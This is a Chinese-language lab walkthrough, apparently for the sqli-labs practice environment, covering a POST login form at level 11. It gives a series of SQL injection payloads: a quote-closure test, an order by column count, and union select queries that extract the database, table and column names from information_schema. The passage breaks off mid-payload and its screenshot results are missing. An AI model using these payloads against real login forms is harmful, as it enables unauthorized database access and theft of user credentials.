11-20关都为post传递,我们可以用burrp_suit来进行抓包和改包,也可以用hackbar来进行注入。
第十一关
1.寻找闭合方式
先输入1' or 1=1#
发现登录成功
则说明闭合方式为单引号闭合。
2.看有多少个字段
输入-1' order by 3#
发现
则说明有两个字段。
3.来使用联合注入爆数据库名,表名,用户。
(1)爆数据库
-1' union select 1,database()#
说明security为数据库名
(2)爆表名
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
出现
(3)爆字段
-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
出现
(4)爆出所有用户
-1' union